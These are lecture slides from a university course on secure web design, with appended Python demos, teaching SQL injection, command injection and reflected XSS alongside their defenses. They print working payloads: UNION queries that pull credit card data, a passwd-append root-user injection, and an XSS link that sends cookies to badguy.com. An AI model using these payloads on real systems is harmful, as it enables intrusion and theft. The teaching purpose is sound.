Web Application Code Common Vulnerabilities SQL Injection

Secure Web Site Design
John Mitchell
CS 155 Spring 2009

Schematic web site architecture
  [Diagram: Firewall → web servers WS1, WS2, WS3 → Load Balancer → Firewall (WAF) → Application Servers → Firewall → DB; IDS; Authorization: Netegrity (CA), Oblix (Oracle)]

Web application code
  • Runs on web server or app server.
    - Takes input from web users (via web server)
    - Interacts with the database and 3rd parties.
    - Prepares results for users (via web server)
  • Examples:
    - Shopping carts, home banking, bill pay, tax prep, …
    - New code written for every web site.
  • Written in:
    - C, PHP, Perl, Python, JSP, ASP, …
    - Often written with little consideration for security

Common vulnerabilities (SANS Top 10)
  • SQL Injection
    - Browser sends malicious input to server
    - Bad input checking leads to malicious SQL query
  • XSS – Cross-site scripting
    - Bad web site sends innocent victim a script that steals information from an honest web site
  • CSRF – Cross-site request forgery
    - Bad web site sends request to good web site, using credentials of an innocent victim who "visits" site
  • Other problems
    - HTTP response splitting, site redirects, …

Dynamic Web Application
  [Diagram: Browser sends "GET / HTTP/1.0" to the Web server (index.php), which talks to the Database server and answers "HTTP/1.1 200 OK"]

SQL Injection
  with slides from Neil Daswani

PHP: Hypertext Preprocessor
  • Server scripting language with C-like syntax
  • Can intermingle static HTML and code
        <input value=<?php echo $myvalue; ?>>
  • Can embed variables in double-quote strings
        $user = "world"; echo "Hello $user!";
    or
        $user = "world"; echo "Hello" . $user . "!";
  • Form data in global arrays $_GET, $_POST, …

SQL
  • Widely used database query language
  • Fetch a set of records
        SELECT * FROM Person WHERE Username='grader'
  • Add data to the table
        INSERT INTO Person (Username, Zoobars) VALUES ('grader', 10)
  • Modify data
        UPDATE Person SET Zoobars=42 WHERE PersonID=5
  • Query syntax (mostly) independent of vendor

Sample PHP
        $recipient = $_POST['recipient'];
        $sql = "SELECT PersonID FROM Person WHERE Username='$recipient'";
        $rs = $db->executeQuery($sql);
  • Problem
    - What if 'recipient' is a malicious string that changes the meaning of the query?

Basic picture: SQL Injection
  [Diagram: Attacker sends (1) an unintended query to the Victim Server, which (2) runs it against the Victim SQL DB; the attacker then (3) receives valuable data]

CardSystems Attack
  • CardSystems
    - credit card payment processing company
    - SQL injection attack in June 2005 put company out of business
  • The Attack
    - 263,000 credit card #s stolen from database
    - credit card #s stored unencrypted
    - 43 million credit card #s exposed

April 2008 SQL Vulnerabilities
  [Figure: not recoverable from the extracted text]

Main steps in this attack
  • Use Google to find sites using a particular ASP style vulnerable to SQL injection
  • Use SQL injection on these sites to modify the page to include a link to a Chinese site nihaorr1.com
    - Don't visit this site yourself!
  • The site (nihaorr1.com) serves JavaScript that exploits vulnerabilities in IE, RealPlayer, QQ Instant Messenger
  • Steps (1) and (2) are automated in a tool that can be configured to inject whatever you like into vulnerable sites
  • There is some evidence that hackers may get paid for each visit to nihaorr1.com

Part of the SQL attack string
        DECLARE @T varchar(255),@C varchar(255)
        DECLARE Table_Cursor CURSOR FOR
          select a.name,b.name from sysobjects a,syscolumns b
          where a.id=b.id and a.xtype='u' and
            (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
        OPEN Table_Cursor
        FETCH NEXT FROM Table_Cursor INTO @T,@C
        WHILE(@@FETCH_STATUS=0) BEGIN
          exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+']))+'' ''')
          FETCH NEXT FROM Table_Cursor INTO @T,@C
        END
        CLOSE Table_Cursor
        DEALLOCATE Table_Cursor;

        DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST( %20AS%20NVARCHAR(4000));EXEC(@S);--

SQL Injection Examples (Type 1 Attack Example)
  [Diagram: Web Browser (Client) → "Enter Username & Password" → Web Server → DB, which runs
        SELECT passwd FROM USERS WHERE uname IS '$username'
   Attacker will modify the input]

SQL Injection Examples (Malicious input)
  [Diagram: Attacker Modifies Input. Username entered:
        '; DROP TABLE USERS; --
   Malicious Query sent to the DB:
        SELECT passwd FROM USERS WHERE uname IS ''; DROP TABLE USERS; -- '
   Eliminates all user accounts]

What is SQL Injection?
  • Input Validation Vulnerability
    - Untrusted user input in SQL query sent to back-end database without sanitizing the data
  • Specific case of more general command injection
    - Inserting untrusted input into a query or command
  • Why is this Bad?
    - Data can be misinterpreted as a command
    - Can alter the intended effect of command or query

SQL Injection Examples
        View pizza order history:<br>
        <form method="post" action="...">
        Month
        <select>
          <option name="month" value="1">Jan</option>
          ...
          <option name="month" value="12">Dec</option>
        </select>
        Year
        <p>
        <input type=submit name=submit value=View>
        </form>
  • Attacker can post a form that is not generated by this page.
SQL Injection Examples
  • Normal SQL Query
        SELECT pizza, toppings, quantity, order_day
        FROM orders
        WHERE userid=4123
        AND order_month=10
  • Type 2 Attack
    - For order_month parameter, attacker could input
        0 OR 1=1
  • Malicious Query
        …
        WHERE userid=4123
        AND order_month=0 OR 1=1
    - WHERE condition is always true!
    - Gives attacker access to other users' private data!
  → All User Data Compromised

SQL Injection Examples
  • A more damaging breach of user privacy:
    - For order_month parameter, attacker could input
        0 AND 1=0
        UNION SELECT cardholder, number, exp_month, exp_year
        FROM creditcards
  • Attacker is able to
    - Combine the results of two queries
    - Empty table from first query with the sensitive credit card info of all users from second query
  → Credit Card Info Compromised

More Attacks
  • Create new users:
        '; INSERT INTO USERS ('uname','passwd','salt') VALUES ('hacker','38a74f', 3234);
  • Password reset:
        '; UPDATE USERS SET [email protected] WHERE [email protected]

Second-Order SQL Injection
  • Second-Order SQL Injection: attack where data stored in the database is later used to conduct SQL injection
  • Example: this vulnerability could exist if string escaping is applied inconsistently
        UPDATE USERS SET passwd='cracked' WHERE uname='admin' --'
    - attacker chooses username 'admin' --
    - Strings not escaped!
  • Solution: Treat ALL parameters as dangerous

Preventing SQL Injection
  • Input validation
    - Filter escape characters
      · Apostrophes, semicolons, percent symbols, hyphens, underscores, …
      · Any character that has special meaning
    - Check the data type (e.g., make sure it's an integer)
  • Whitelisting
    - Blacklisting chars doesn't work
      · forget to filter out some characters
      · could prevent valid input (e.g. username O'Brien)
    - Allow only a well-defined set of safe values
      · Set implicitly defined through regular expressions

Escaping Quotes
  • For valid string inputs like username o'connor, use escape(o'connor) = o''connor
    - only works for string inputs

Prepared Statements
  • Metacharacters (e.g. ') in queries provide the distinction between data & control
  • Most attacks: data interpreted as control / alters the semantics of a query/cmd
  • Bind Variables: ? placeholders guaranteed to be data (not control)
  • Prepared Statements allow creation of static queries with bind variables → preserves the structure of the intended query

Prepared Statement: Example
        PreparedStatement ps =
          db.prepareStatement("SELECT pizza, toppings, quantity, order_day "
                              + "FROM orders WHERE userid=? AND order_month=?");
        ps.setInt(1, session.getCurrentUserId());
        ps.setInt(2, Integer.parseInt(request.getParameter("month")));
        ResultSet res = ps.executeQuery();
  • Bind Variable: Data Placeholder (the ? marks)
  • query parsed w/o parameters
  • bind variables are typed e.g. int, string, etc…

Parameterized SQL
  • Build SQL queries by properly escaping args: ′ → \′
  • Example: Parameterized SQL (ASP.NET 1.1)
    - Ensures SQL arguments are properly escaped.
        SqlCommand cmd = new SqlCommand(
            "SELECT * FROM UserTable WHERE username = @User AND password = @Pwd",
            dbConnection);
        cmd.Parameters.Add("@User", Request["user"]);
        cmd.Parameters.Add("@Pwd", Request["pwd"]);
        cmd.ExecuteReader();

Mitigating Impacts
  • Prevent Schema & Information Leaks
  • Limit Privileges (Defense-in-Depth)
  • Encrypt Sensitive Data stored in Database
  • Harden DB Server and Host OS
  • Apply Input Validation

Other command injection
  • Example: PHP server-side code for sending email
        $email = $_POST["email"];
        $subject = $_POST["subject"];
        system("mail $email -s $subject < /tmp/joinmynetwork");
  • Attacker can post
        http://yourdomain.com/mail.pl?[email protected]&subject=foo < /usr/passwd; ls
    OR
        http://yourdomain.com/mail.pl?[email protected]&subject=foo; echo "evil::0:0:root:/:/bin/sh">>/etc/passwd; ls

Cross Site Scripting (XSS)

Basic scenario: reflected XSS attack
  [Diagram: Attack Server, Victim client, Victim Server, with numbered steps 1, 2, … 5]

The setup
  • User input is echoed into HTML response.
  • Example: search field
        http://victim.com/search.php?term=apple
    search.php responds with:
        <HTML> <TITLE> Search Results </TITLE>
        <BODY>
        Results for <?php echo $_GET[term] ?> :
        . . .
        </BODY> </HTML>
  • Is this exploitable?

Bad input
  • Consider link: (properly URL encoded)
        http://victim.com/search.php?term=
          <script> window.open(
            "http://badguy.com?cookie = " +
            document.cookie )</script>
  • What if user clicks on this link?
    1. Browser goes to victim.com/search.php
    2. Victim.com returns
        <HTML> Results for <script> … </script>
    3. Browser executes script:
       - Sends badguy.com cookie for victim.com

  [Diagram: Attack Server www.attacker.com; Victim client; Victim Server www.victim.com.
   Request: http://victim.com/search.php?term=<script> ... </script>
   Response: <html> Results for <script> window.open(http://attacker.com? ... document.cookie ...) </script>]
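The pizza-order slides (the Type 2 "0 OR 1=1" input, the UNION of the creditcards table, and the prepared-statement fix) can be reproduced end to end against an in-memory SQLite database. The example below is added here for illustration and is not code from the slides or from the course; the tables, rows and function names are constructed for the demo, and the "whitelist" month check is the data-type validation the "Preventing SQL Injection" slide describes.

```python
import sqlite3

# Constructed sample data (not from the slides): orders for two users plus a
# creditcards table, mirroring the tables named in the pizza-order example.
ORDERS = [
    (4123, "margherita", "basil", 1, 3, 10),
    (4123, "pepperoni", "extra cheese", 2, 17, 10),
    (4124, "hawaiian", "pineapple", 1, 5, 10),
]
CREDITCARDS = [
    ("Alice Example", "4111111111111111", 1, 2030),
    ("Bob Example", "5555555555554444", 12, 2029),
]


def make_db():
    """In-memory SQLite database populated with the constructed sample rows."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE orders (userid INT, pizza TEXT, toppings TEXT, "
               "quantity INT, order_day INT, order_month INT)")
    db.executemany("INSERT INTO orders VALUES (?,?,?,?,?,?)", ORDERS)
    db.execute("CREATE TABLE creditcards (cardholder TEXT, number TEXT, "
               "exp_month INT, exp_year INT)")
    db.executemany("INSERT INTO creditcards VALUES (?,?,?,?)", CREDITCARDS)
    return db


def history_vulnerable(db, userid, month):
    """The slides' vulnerable pattern: the request parameter is pasted into the
    query text, so whatever it contains is parsed as SQL (data becomes control)."""
    sql = ("SELECT pizza, toppings, quantity, order_day FROM orders "
           f"WHERE userid={userid} AND order_month={month}")
    return db.execute(sql).fetchall()


def history_prepared(db, userid, month):
    """Prepared statement: the '?' placeholders are bound as data after the
    query has been parsed, so its structure cannot be changed by the value."""
    sql = ("SELECT pizza, toppings, quantity, order_day FROM orders "
           "WHERE userid=? AND order_month=?")
    return db.execute(sql, (userid, month)).fetchall()


def parse_month(raw):
    """Whitelist validation (hypothetical helper): the month must be an integer
    in 1..12; anything else is rejected before it reaches the database."""
    try:
        month = int(raw)
    except (TypeError, ValueError):
        raise ValueError("month must be an integer") from None
    if not 1 <= month <= 12:
        raise ValueError("month out of range")
    return month


if __name__ == "__main__":
    db = make_db()
    # Inputs taken from the slides: the always-true WHERE and the UNION.
    or_true = "0 OR 1=1"
    union = ("0 AND 1=0 UNION SELECT cardholder, number, exp_month, exp_year "
             "FROM creditcards")
    print("vulnerable, 0 OR 1=1 :", history_vulnerable(db, 4123, or_true))
    print("vulnerable, UNION    :", history_vulnerable(db, 4123, union))
    print("prepared,   0 OR 1=1 :", history_prepared(db, 4123, or_true))
    print("validated month      :", history_prepared(db, 4123, parse_month("10")))
```

With the string-built query, user 4123's "0 OR 1=1" returns every user's orders and the UNION input returns the creditcards rows in place of orders. With the bound parameter the same strings are compared as a value against the integer column and match nothing, and `parse_month` rejects them outright, which is the layered defense the slides recommend.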
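The "Other command injection" slide (the mail handler that hands `$email` and `$subject` to a shell) and the reflected XSS slides (search.php echoing `term` into HTML) are two instances of the same mistake: user data reaches another interpreter as control. The example below is added for illustration and is not code from the slides; the function names and the address whitelist are my own assumptions. It shows the defender's side for both: building an argument list instead of a shell string (and whitelisting the address), and HTML-escaping the search term so the browser treats it as text.

```python
import html
import re
import shlex

# Hypothetical whitelist for the mail address: the slide's fix list calls for
# allowing only a well-defined set of safe values.
EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")


def build_mail_argv(email, subject):
    """Return an argv list for subprocess.run(argv, shell=False) instead of a
    shell command line. Each field is one argv entry, so ';', '<' or '>' inside
    it are never seen by a shell; the address is additionally whitelisted."""
    if not EMAIL_RE.fullmatch(email):
        raise ValueError("invalid email address")
    return ["mail", "-s", subject, email]


def argv_as_shell_line(argv):
    """For display only: how the argv would have to be quoted to survive a
    shell. shlex.join single-quotes any element containing metacharacters."""
    return shlex.join(argv)


def render_search_vulnerable(term):
    """search.php from the slides: the parameter is echoed raw into the HTML,
    so a <script> in it is parsed as markup and executed."""
    return ("<HTML><TITLE>Search Results</TITLE><BODY>Results for "
            f"{term}:</BODY></HTML>")


def render_search_escaped(term):
    """Output encoding: html.escape turns <, >, &, and quotes into entities,
    so the browser renders the term as text instead of parsing it."""
    return ("<HTML><TITLE>Search Results</TITLE><BODY>Results for "
            f"{html.escape(term, quote=True)}:</BODY></HTML>")


if __name__ == "__main__":
    # Subject string taken from the slide; address is a constructed sample.
    argv = build_mail_argv("user@example.com", "foo < /usr/passwd; ls")
    print(argv)
    print(argv_as_shell_line(argv))
    try:
        build_mail_argv("user@example.com; ls", "hello")
    except ValueError as exc:
        print("rejected address:", exc)
    # Search term from the slides' "Bad input" link.
    term = '<script> window.open("http://badguy.com?cookie = " + document.cookie )</script>'
    print(render_search_vulnerable(term))
    print(render_search_escaped(term))
```

Note that the argv approach protects against shell metacharacters but not against the program itself misinterpreting an argument (for example an argument beginning with `-`), which is why the whitelist on the address is kept as a second layer; likewise `html.escape` is the right encoding only for an HTML text or attribute context, not for a JavaScript or URL context.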
